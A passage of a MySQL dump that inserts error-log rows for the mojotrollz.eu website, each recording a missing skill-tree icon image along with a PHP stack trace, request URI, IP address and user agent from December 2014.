'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 105, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (572, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_powerinfusion.png\' found.', 'a69e3622ba82e6aea6e9ab22d03e2769bccb73e9', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_powe...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_powe...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_powerinfusion.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 103, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (573, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_healingfocus.png\' found.', '9f55479bbc7409d02b963b882b516dba4eace551', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_heal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_heal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.052, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_healingfocus.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 100, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (574, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_renew.png\' found.', '3bcc9e31ad655b900e1131d2e3b9b9311eec6c01', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_rene...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_rene...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:40:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_renew.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 100, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (575, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_sealofsalvation.png\' found.', '408c0d8fa81ec71e1c6dc13927c4eeb9b7457e6a', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_seal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_seal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_sealofsalvation.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 97, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (576, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_spellwarding.png\' found.', '86bf8e000fe6bab421f196cdab88f07aea3c5360', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_spel...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_spel...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.032, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_spellwarding.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 96, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (577, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_sealofwrath.png\' found.', '0dcb9639881a557cb938dc8799595bac43042e36', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_seal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_seal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_sealofwrath.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 94, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (578, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_blessedrecovery.png\' found.', 'db5e49fc9b29910905a914bab5d19f6693edda58', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_bles...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_bles...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_blessedrecovery.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 90, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (579, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_holynova.png\' found.', '771a4dd5a598370ebe18d61039b83e6368698af6', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_holy...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_holy...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.032, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_holynova.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 90, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (580, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_purify.png\' found.', 'f7f5f0dc0463e8e8a5bf17035985c2aee3e7580e', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_puri...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_puri...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_purify.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 83, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (581, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_heal_02.png\' found.', '2657d926e9bcba240afb71b530740af5c1bc5820', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_heal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_heal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 00:36:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_heal_02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (582, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_heal02.png\' found.', '2b45bf3067c9b6bb05658482548bda24aabc5144', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_heal...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_heal...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_heal02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 79, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (583, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_searinglightpriest.png\' found.', '555130ae0811ce932f30e30364d530c5abca571b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_sear...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_sear...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_searinglightpriest.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 77, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (584, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_prayerofhealing02.png\' found.', '70c1b87852f7cd56c1c32c71dfea4054740e5338', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_pray...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_pray...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:40:17', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_prayerofhealing02.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 66, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (585, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'inv_enchant_essenceeternallarge.png\' found.', '9e742a08aa16b436e32682fa471afa419f2a24c1', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'inv_enchant_ess...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'inv_enchant_ess...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.016, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=inv_enchant_essenceeternallarge.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 63, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (586, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_spiritualguidence.png\' found.', 'd3b09cd9c67144fea72417d1677132fc4b8ade85', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_spir...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_spir...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_holy_spiritualguidence.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 61, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (587, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_summonlightwell.png\' found.', '6c4193b38472676049d00a22b0a38783d8806703', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_summ...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_summ...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_summonlightwell.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 57, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (588, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_requiem.png\' found.', 'c0a8edeb570d298fdf14aebad241279f56f4262b', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_re...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_re...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, '2014-12-14 03:37:56', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_requiem.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 179, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (589, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_gathershadows.png\' found.', 'adb462d299e97dcc8bebd861d9658cbfe089bec3', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_ga...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_ga...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.036, '2014-12-14 03:37:56', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills&id=spell_shadow_gathershadows.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 118, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (590, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_shadowwordpain.png\' found.', 'a6858368d98e8dc5b25cbe008e9d415758f87318', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_sh...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_sh...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.024, '2014-12-14 03:37:55', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_shadow_shadowwordpain.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 56, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (591, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_shadow_burningspirit.png\' found.', 'dfe7730782360bce7d0b9c93fde3a0818dc5a5d2', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_shadow_bu...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_shadow_bu...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.008, 